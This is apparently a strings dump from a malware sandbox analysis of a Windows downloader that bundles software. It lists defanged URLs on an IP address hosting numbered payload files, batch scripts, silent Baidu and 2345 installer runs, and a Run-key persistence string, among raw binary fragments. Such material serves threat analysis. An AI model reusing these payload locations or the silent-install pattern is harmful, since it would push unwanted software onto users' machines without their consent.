hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b1?public&code=65e1f8bb6a35d835ac36afb3fe114df0

D:\dream\7b2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b2?public&code=75e1b53f8002b8fcbef1533ddcf838f3

D:\dream\7b3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b3?public&code=2bb598cb60451c4b4c1930932c14c586

D:\dream\7b4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b4?public&code=4cdbf863df18a09984db8531c4f8dac0

D:\dream\7b5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b5?public&code=192609a39126a61929211de82ef70fd6

D:\dream\bdBrowserSetup-5956-ftn_1050103060.exe

D:\dream\bdllq.bat

hXXp://cnrdn.com/rd.htm?id=1483547&r=http://VVV.baidu.com/

D:\dream\uc1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423

D:\dream\uc2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc2?public&code=fc17f9c282f24d1cb0252ce893cddb8f

D:\dream\uc3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc3?public&code=950c1793575761983e9f4158bbce1bc5

D:\dream\uc4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc4?public&code=4521c8d77cc1a0a675996ecf979e172c

D:\dream\uc5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc5?public&code=7ec7b3ccb21e6f94450c8a28eeed7c0e

D:\dream\uc6

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc6?public&code=d05b6e4a191a5f39789a63a568014257

D:\dream\lgeuc

D:\dream\3.bat

hXXp://cnrdn.com/rd.htm?id=1438530&r=http://VVV.baidu.com/

D:\dream\LGGJ1

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj1?public&code=4a75a81d3a3bd72da91812797aef200d

D:\dream\LGGJ2

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj2?public&code=a6fa20fdd08e3ec9e3496d63a0eec383

D:\dream\LGGJ3

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj3?public&code=a5f1a0eb336396b0f30042c519b63bf8

D:\dream\LGGJ4

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj4?public&code=141c350ea3e5d691e30f16d167d73849

D:\dream\LGGJ5

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/lggj/lggj5?public&code=848235d5b4818734d8dfed8d52f909d5

D:\dream\lgegj

D:\dream\lggj.bat

hXXp://cnrdn.com/rd.htm?id=1489621&r=http://VVV.baidu.com/

D:\dream\zmbd

hXXp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe

D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe

D:\dream\zmbd.bat

hXXp://cnrdn.com/rd.htm?id=1442397&r=http://VVV.baidu.com/

hXXp://cnrdn.com/rd.htm?id=1489464&r=http://VVV.baidu.com/

hXXp://cnrdn.com/rd.htm?id=1384177&r=http://VVV.baidu.com/

D:\MM-liao9728.exe

D:\MM-liao

hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424

hXXp://cnrdn.com/rd.htm?id=1490574&r=http://VVV.baidu.com/

%Ui,)

tÃ¼V

1.2.18

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

MSWHEEL_ROLLMSG

__MSVCRT_HEAP_SELECT

portuguese-brazilian

iphlpapi.dll

SHLWAPI.dll

MPR.dll

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

(%d-%d):

%ld%c

(*.avi)|*.avi

WPFT532.CNV

WPFT632.CNV

EXCEL32.CNV

write32.wpc

Windows Write

mswrd632.wpc

Word for Windows 6.0

wword5.cnv

Word for Windows 5.0

mswrd832.cnv

mswrd632.cnv

Word 6.0/95 for Windows & Macintosh

html32.cnv

Service Pack %d

Windows 2003

Windows XP

Windows 2000

Windows NT

Windows ??

Windows Millenium Edition

Windows 98 Second Edition

Windows 98 SP1

Windows 98

Windows 95 OSR2

Windows 95 SP1

Windows 95

Windows CE

Microsoft Windows Me

Microsoft Windows 98

Microsoft Windows 95

Microsoft Windows 2003

Microsoft Windows XP

Microsoft Windows 2000

Microsoft Windows NT

KERNEL32.DLL

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÃ

Microsoft\Windows\CurrentVersion\Uninstall

HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\SofQI

x86 9.0.30729.4148

c:\%original file name%.exe

GetCPInfo

GetWindowsDirectoryA

WinExec

GetProcessHeap

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

ShellExecuteA

GetKeyboardLayout

GetKeyState

SetWindowsHookExA

UnhookWindowsHookEx

CreateDialogIndirectParamA

.text

.rdata

@.data

.rsrc

@.text

%Cou.N

(*.*)

Baidu_Setup_1.6.200.359_ftn_1050103060.exe_1216:

.text

`.rdata

@.data

.ndata

.rsrc

@.reloc

RegDeleteKeyExW

Kernel32.DLL

PSAPI.DLL

%s=%s

GetWindowsDirectoryW

KERNEL32.dll

ExitWindowsEx

GetAsyncKeyState

USER32.dll

GDI32.dll

SHFileOperationW

ShellExecuteW

SHELL32.dll

RegDeleteKeyW

RegCloseKey

RegEnumKeyW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

uKeY

) %s#

OZ.nfwV

5m6c6

8$8@8_8~8

= =)=4=;=

6o6s6z6

6)646*959

3"4'4.434:4?4

0 0(050

7%7s7

4 4$4(4,404

; ;$;(;3;

7 7$7(7,707

5 5$5(5,505

: :$:(:,:

; ;$;,;@;`;

Nullsoft Install System v2.46.5-Unicode

logging set to %d

settings logging to %d

created uninstaller: %d, "%s"

WriteReg: error creating key "%s\%s"

WriteReg: error writing into "%s\%s" "%s"

WriteRegBin: "%s\%s" "%s"="%s"

WriteRegDWORD: "%s\%s" "%s"="0xx"

WriteRegExpandStr: "%s\%s" "%s"="%s"

WriteRegStr: "%s\%s" "%s"="%s"

DeleteRegKey: "%s\%s"

DeleteRegValue: "%s\%s" "%s"

WriteINIStr: wrote [%s] %s=%s in %s

CopyFiles "%s"->"%s"

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d

Error registering DLL: Could not load %s

Error registering DLL: %s not found in %s

GetTTFFontName(%s) returned %s

GetTTFVersionString(%s) returned %s

Exec: failed createprocess ("%s")

Exec: success ("%s")

Exec: command="%s"

ExecShell: success ("%s": file:"%s" params:"%s")

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d

Exch: stack

RMDir: "%s"

MessageBox: %d,"%s"

Delete: "%s"

File: wrote %d to "%s"

File: skipped: "%s" (overwriteflag=%d)

File: error creating "%s"

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"

Rename failed: %s

Rename on reboot: %s

Rename: %s

IfFileExists: file "%s" does not exist, jumping %d

IfFileExists: file "%s" exists, jumping %d

CreateDirectory: "%s" created

CreateDirectory: can't create "%s" - a file already exists

CreateDirectory: can't create "%s" (err=%d)

CreateDirectory: "%s" (%d)

SetFileAttributes: "%s":X

Sleep(%d)

detailprint: %s

Call: %d

Aborting: "%s"

Jump: %d

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

install.log

%u.%u%s%s

Skipping section: "%s"

Section: "%s"

New install of "%s" to "%s"

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

*?|/":

invalid registry key

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

x%c

RMDir: RemoveDirectory failed("%s")

RMDir: RemoveDirectory on Reboot("%s")

RMDir: RemoveDirectory("%s")

RMDir: RemoveDirectory invalid input("%s")

Delete: DeleteFile failed("%s")

Delete: DeleteFile on Reboot("%s")

Delete: DeleteFile("%s")

%s: failed opening file "%s"

S~1\Temp\nsz3.tmp\InstallHelper.dll

\msvcr80.dll

80.CRT.manifest

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz3.tmp\InstallHelper.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz3.tmp

nsz3.tmp

File: wrote 802816 to "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz3.tmp\InstallHelper.dll"

nsz3.tmp\InstallHelper.dll"

1.6.200.359

:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz3.tmp

D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe

%WinDir%\Temp\baidu\youqian

%WinDir%\Temp\baidu\youqian\

Microsoft.VC80.CRT

D:\dream

Baidu_Setup_1.6.200.359_ftn_1050103060.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

1.6.200.359

Baidu_Setup_1.6.200.359_ftn_1050103060.exe_1272:

.text

`.rdata

@.data

.ndata

.rsrc

@.reloc

RegDeleteKeyExW

Kernel32.DLL

PSAPI.DLL

%s=%s

GetWindowsDirectoryW

KERNEL32.dll

ExitWindowsEx

GetAsyncKeyState

USER32.dll

GDI32.dll

SHFileOperationW

ShellExecuteW

SHELL32.dll

RegDeleteKeyW

RegCloseKey

RegEnumKeyW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

>ÃŒW

s.Zn|

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

&hXXps://VVV.globalsign.com/repository/03

"hXXp://crl.globalsign.net/root.crl0

hXXp://ts-ocsp.ws.symantec.com07

hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0

hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(

&hXXps://VVV.globalsign.com/repository/0

-hXXp://crl.globalsign.com/gs/gscodesigng2.crl0

4hXXp://secure.globalsign.com/cacert/gscodesigng2.crt04

(hXXp://ocsp2.globalsign.com/gscodesigng20

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

hXXp://mini.baidu.com 0

System.dll

2Beijing baidu Netcom science and technology co.ltd1>0

2Beijing baidu Netcom science and technology co.ltd0

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

hXXps://VVV.verisign.com/cps0*

#hXXp://logo.verisign.com/vslogo.gif04

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://ocsp.verisign.com0

K7.cX?

>>>.AAA

Nullsoft Install System v2.46.5-Unicode

logging set to %d

settings logging to %d

created uninstaller: %d, "%s"

WriteReg: error creating key "%s\%s"

WriteReg: error writing into "%s\%s" "%s"

WriteRegBin: "%s\%s" "%s"="%s"

WriteRegDWORD: "%s\%s" "%s"="0xx"

WriteRegExpandStr: "%s\%s" "%s"="%s"

WriteRegStr: "%s\%s" "%s"="%s"

DeleteRegKey: "%s\%s"

DeleteRegValue: "%s\%s" "%s"

WriteINIStr: wrote [%s] %s=%s in %s

CopyFiles "%s"->"%s"

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d

Error registering DLL: Could not load %s

Error registering DLL: %s not found in %s

GetTTFFontName(%s) returned %s

GetTTFVersionString(%s) returned %s

Exec: failed createprocess ("%s")

Exec: success ("%s")

Exec: command="%s"

ExecShell: success ("%s": file:"%s" params:"%s")

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d

Exch: stack

RMDir: "%s"

MessageBox: %d,"%s"

Delete: "%s"

File: wrote %d to "%s"

File: skipped: "%s" (overwriteflag=%d)

File: error creating "%s"

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"

Rename failed: %s

Rename on reboot: %s

Rename: %s

IfFileExists: file "%s" does not exist, jumping %d

IfFileExists: file "%s" exists, jumping %d

CreateDirectory: "%s" created

CreateDirectory: can't create "%s" - a file already exists

CreateDirectory: can't create "%s" (err=%d)

CreateDirectory: "%s" (%d)

SetFileAttributes: "%s":X

Sleep(%d)

detailprint: %s

Call: %d

Aborting: "%s"

Jump: %d

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

install.log

%u.%u%s%s

Skipping section: "%s"

Section: "%s"

New install of "%s" to "%s"

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

*?|/":

invalid registry key

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

x%c

RMDir: RemoveDirectory failed("%s")

RMDir: RemoveDirectory on Reboot("%s")

RMDir: RemoveDirectory("%s")

RMDir: RemoveDirectory invalid input("%s")

Delete: DeleteFile failed("%s")

Delete: DeleteFile on Reboot("%s")

Delete: DeleteFile("%s")

%s: failed opening file "%s"

1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp\InstallHelper.dll

lient\1.6.200.359\Baidu.exe" -i 2#"%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359" -p 3

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp\InstallHelper.dll

Poicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp

aidu\BaiduClient\1.6.200.359

\Baidu.exe" -noclient

ient\1.6.200.359

callback%d

kernel32.dll

nsb6.tmp

File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp\InstallHelper.dll" (overwriteflag=1)

stallHelper.dll"

:\Documents and Settings\"%CurrentUserName%"\AppData\Local\Baidu\BaiduClient\1.6.200.359" -p 3")

\Local\Baidu\BaiduClient\1.6.200.359"

ient\1.6.200.359\BDClientProxy.dll

%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359" -p 3

1050103060

.200.359_ftn_1050103060.exe

\WINDOWS\Temp\baidu\youqian\

\Baidu_Setup_1.6.200.359_ftn_1050103060.exe" /S

0103060

050103060.exe

"%WinDir%\Temp\baidu\youqian\

%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359

yinyue\1.0.0.0

1.0.0.2

%WinDir%\Temp\baidu\youqian\

Baidu_Setup_1.6.200.359_ftn_1050103060.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl4.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

\Baidu_Setup_1.6.200.359_ftn_1050103060.exe

%Documents and Settings%\%current user%\Desktop

%Documents and Settings%\%current user%\Start Menu\Programs

%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient

%Documents and Settings%\All Users

%Documents and Settings%\All Users\Application Data

%Documents and Settings%\%current user%\Application Data

1.6.200.359

Baidu.exe_1988:

.text

`.rdata

@.data

.rsrc

@.reloc

Base.dll

Utils.dll

WS2_32.dll

Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag

unsupported version

asio.misc

asio.misc error

thread.entry_event

thread.exit_event

E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/IPCMessager.h

E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/ChildProcess.h

CChildProcess::HandleMsg() invalid message id.

Base::Process::CChildProcess::HandleMsg

BrowserProcess.cpp

NeedInstallNewVersion:%d

DecodeMsgContent() serialization error

DecodeMsgContent

E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/IPCMessageDef.h

E:\MiniBaidu\minibaidu_stable_proj\Include\boost/exception/detail/exception_ptr.hpp

EncodeMsgContent() serialization error

EncodeMsgContent

BrowserShell.cpp

Heartbeat.dll

BDMSkin.dll

Skins\CommonRes.rdb

UIHandler.dll

BrowserFrame.dll

C:\Windows\System32\riched20.dll

e:\minibaidu\minibaidu_client_proj\source\brbrowser\AppPrefetcher.h

open file error: %x

BrowserShellMain.cpp

CommonWorkerProcess.cpp

CCommonWorkerProcess::HandleMsg Fail to handle %d message.

CCommonWorkerProcess::HandleMsg

CCommonWorkerProcess::GetInstance Fail to get %d instance

Report %d data

CCommonWorkerProcess::HandleReportJob

CCommonWorkerProcess::HandleReportJob Fail to handle %d message

GetReportMgr

ReleaseReportMgr

CCommonWorkerProcess::HandleProtocolJob Fail to handle %d message

boost thread: trying joining itself

E:\MiniBaidu\Basic\Include\CommonInclude\Base/Process/AsyncTask.h

PluginMgrProcess.cpp

RendererProcess.cpp

E:\MiniBaidu\Basic\Output\BinRelease\Baidu.pdb

?QueryKeyValue@Register@Base@@YAHPAUHKEY__@@PB_W1PA_WPAK@Z

Report.dll

MSVCP100.dll

MSVCR100.dll

_amsg_exit

_acmdln

_crt_debugger_hook

GetProcessHeap

CreateIoCompletionPort

KERNEL32.dll

USER32.dll

RegCreateKeyExW

RegOpenKeyExW

RegCloseKey

ADVAPI32.dll

ole32.dll

ShellExecuteW

SHELL32.dll

SHLWAPI.dll

WINMM.dll

.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@@detail@serialization@boost@@

.?AV?$singleton@V?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@@serialization@boost@@

.?AV?$extended_type_info_typeid@USLaunchDone@ControlMsg@@@serialization@boost@@

.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@

.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@

.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@@detail@serialization@boost@@

.?AV?$singleton@V?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@@serialization@boost@@

.?AV?$extended_type_info_typeid@USRunDone@ControlMsg@@@serialization@boost@@

.?AV?$oserializer@Vbinary_oarchive@archive@boost@@USRunDone@ControlMsg@@@detail@archive@boost@@

.?AV?$singleton_wrapper@V?$oserializer@Vbinary_oarchive@archive@boost@@USRunDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@

.?AV?$oserializer@Vbinary_oarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@

.?AV?$singleton_wrapper@V?$oserializer@Vbinary_oarchive@archive@boost@@USLaunchDone@ControlMsg@@@detail@archive@boost@@@detail@serialization@boost@@

.?AV?$bind_t@_NV?$mf1@_NVCChildProcess@Process@Base@@ABUSIPCMsg@IPCMessager@3@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCChildProcess@Process@Base@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@

.?AUSLaunchDone@ControlMsg@@

.?AUSRunDone@ControlMsg@@

.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@@detail@serialization@boost@@

.?AV?$singleton_wrapper@V?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@@detail@serialization@boost@@

.?AV?$singleton@V?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@@serialization@boost@@

.?AV?$extended_type_info_typeid@USHostLoginNotification@CommonServiceMsg@@@serialization@boost@@

.?AV?$singleton@V?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@@serialization@boost@@

.?AV?$extended_type_info_typeid@USHostDoReport@CommonServiceMsg@@@serialization@boost@@

.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USHostLoginNotification@CommonServiceMsg@@@detail@archive@boost@@@detail@serialization@boost@@

.?AV?$singleton_wrapper@V?$iserializer@Vbinary_iarchive@archive@boost@@USHostDoReport@CommonServiceMsg@@@detail@archive@boost@@@detail@serialization@boost@@

.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USHostLoginNotification@CommonServiceMsg@@@detail@archive@boost@@

.?AV?$iserializer@Vbinary_iarchive@archive@boost@@USHostDoReport@CommonServiceMsg@@@detail@archive@boost@@

.?AV?$bind_t@XV?$mf1@XVCCommonWorkerProcess@@ABUSIPCMsg@IPCMessager@Base@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VCCommonWorkerProcess@@@boost@@@_bi@boost@@V?$value@USIPCMsg@IPCMessager@Base@@@23@@_bi@3@@_bi@boost@@

.?AUSHostDoReport@CommonServiceMsg@@

.?AUSHostLoginNotification@CommonServiceMsg@@

%uuqb

?"?4?;?|?

;%;*;2;{;

5T5C5R5a5p5

= =$=(=,=0=4=8=

9 9@9`9|9

3 3$3(3,30343

A8706990-9490-4106-8033-12E64714B86B

Protocol.dll

CHROMECORE_PROCESS

\WebkitEngine.dll

\TridentEngine.dll

chrome-extension

url-safe

res://LocalPages.dll/

.html

.br.baidu.com

.bdl.brs

--default-chromecore-path=

--disable-chromecore

Reply msg to parent

Start hearbeat and send heartbeat msg.

password

C1BB4C06-D91C-47D8-B28E-E76B943205E9

user32.dll

\LogicMisc.dll

\UIHandler.dll

Upd.dat

BaiduUpdate.exe

\BrowserFrame.dll

\Heartbeat.dll

%ws\Utils.dll

%ws\Base.dll

Leave PrefetchData:readFile error code=%d

Enter Base::MemoryOptimizer::Instance().Start()

Leave Base::MemoryOptimizer::Instance().Start()

Baidu.exe

@\CommonWorker.dll

Failed in init CommonWorker.dll instance.

pCCommonWorkerProcess::Run installationTask = %s

CCommonWorkerProcess::Run customid = %d shmoffset = %d

CCommonWorkerProcess::HandleInstallationTask() strTaskType=%s strTaskParam=%s

BaiduBugRpt.exe

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

uninst.exe

HandleSCNotifyTask ItemID = %d shmoffset = %d

HandleSCNotifyTask wszSrcFileName = %s

HandleSCNotifyTask monitorid = %d

HandleSCNotifyTask eventType = %d

ShellExecute result = %d

sBDClientProxy.dll

Software\Microsoft\Windows\CurrentVersion\Run

ClientRegAddValueToList result = %d

nClientRegSetValueEx result = %d

GetDefenseSwitch value = %s

GetDefenseSwitch Read Reg failed! err = %d

\PluginMgr.dll

p\BrowserCore.dll

1.6.200.359

svchost.exe_2356:

.text

`.data

.rsrc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

RPCRT4.dll

NETAPI32.dll

ole32.dll

ntdll.dll

RegCloseKey

RegOpenKeyExW

GetProcessHeap

NtOpenKey

svchost.pdb

\PIPE\

Software\Microsoft\Windows NT\CurrentVersion\Svchost

\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\

5.1.2600.5512 (xpsp.080413-2111)

svchost.exe

Windows

Operating System

5.1.2600.5512

BaiduUpdate.exe_3784:

.text

`.rdata

@.data

.rsrc

@.reloc

asio.misc

asio.misc error

ToolService.cpp

BRBAppUpdate.cpp

====AppUpdate load bdmupdate.dll success====

DeleteInstallFile.bdl success

NeedInstallNewVersion:%d

====AppUpdate: Check Callback , need update, type %d====

====AppUpdate or MdlUpd download progress %d ====

====AppUpdate or MdlUpd download finish %d ====

====start report update data( start install)====

CBRBAppUpdate::ReportUpdateData

====report : rst %d , mode %d , failreason %d , downloaddetailcode %d ====

====end report update data( start install)====

HBTipsListData: %s

HBTipsListSize: %d

BRBUpdateApp.cpp

BRBUpdateWnd.cpp

====OnCopyData %d====

Main.cpp

E:\MiniBaidu\Basic\Output\BinRelease\BaiduUpdate.pdb

?TranslateMessage@IControlManger@ExpandInterface@BDMSkin@@SA_NQAUtagMSG@@@Z

BDMSkin.dll

ReleaseReportMgr

GetReportMgr

Report.dll

Base.dll

??1CCmdParser@Misc@Utils@@UAE@XZ

??0CCmdParser@Misc@Utils@@QAE@PB_WQAPB_WH@Z

Utils.dll

KERNEL32.dll

USER32.dll

GDI32.dll

RegOpenKeyExW

RegCloseKey

ADVAPI32.dll

ShellExecuteW

SHELL32.dll

ole32.dll

MSVCP100.dll

WS2_32.dll

SHLWAPI.dll

MSVCR100.dll

_amsg_exit

_wcmdln

_crt_debugger_hook

BaiduUpdate.exe

.?AVCCmdLine@@

%uuqb

>*>/>9>|>

4!4,4:4^4|4

sCheckFileHash OK %s

pCheckFileHash Md5 error !! %s

CommonRes.rdb

file='skin_image1.png' xtiled='true' ytiled='true'

BRBrowser_Setup_1.0.0.108

Update.dll

Upd.dat

Download err=%d

SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

"%s" %s

OnlyInstallWnd.xml

BRBUpdate.xml

NeedInstallNewVersion Filename=%s

upd_msgboxwnd.xml

question_icon.png

eBaidu.exe

MainPath %s

hXXp://anquan.baidu.com/

oupd_new.png

oupd_warning.png

=upd_dialog_big.png

upd_dialog_small.png

BAIDUUPDATE_{F7829293-F6C1-410f-8685-D050B09FE904}

1.6.200.359

2345pic_k1252705.exe_2088:

.text

`.rdata

@.data

.ndata

.rsrc

RegDeleteKeyExW

Kernel32.DLL

PSAPI.DLL

%s=%s

GetWindowsDirectoryW

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationW

ShellExecuteW

SHELL32.dll

RegDeleteKeyW

RegCloseKey

RegEnumKeyW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

.}%FT

9X.LX

W.zs,

e.QST

;,;8;@;`;

0 0

;(;,;0;4;

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

.Class 3 Public Primary Certification Authority0

hXXp://crl.verisign.com/pca3.crl0

hXXps://VVV.verisign.com/cps0

#hXXp://logo.verisign.com/vslogo.gif04

hXXp://ocsp.verisign.com0

hXXp://ts-ocsp.ws.symantec.com07

hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0

hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

2345.com1>0

2345.com0

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

hXXps://VVV.verisign.com/cps0*

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://pic.2345.com/0

7%7x7

= =$=(=,=0=

Nullsoft Install System v2.46-Unicode

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

*?|/":

adm\LOCALS~1\Temp\nse9.tmp\RCWidgetPlugin.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse9.tmp\RCWidgetPlugin.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse9.tmp

nse9.tmp

e9.tmp

\dream\2345pic_k1252705.exe -s1

D:\dream\2345pic_k1252705.exe -s1

%Program Files%\2345Soft\2345Pic

D:\dream

2345pic_k1252705.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse7.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

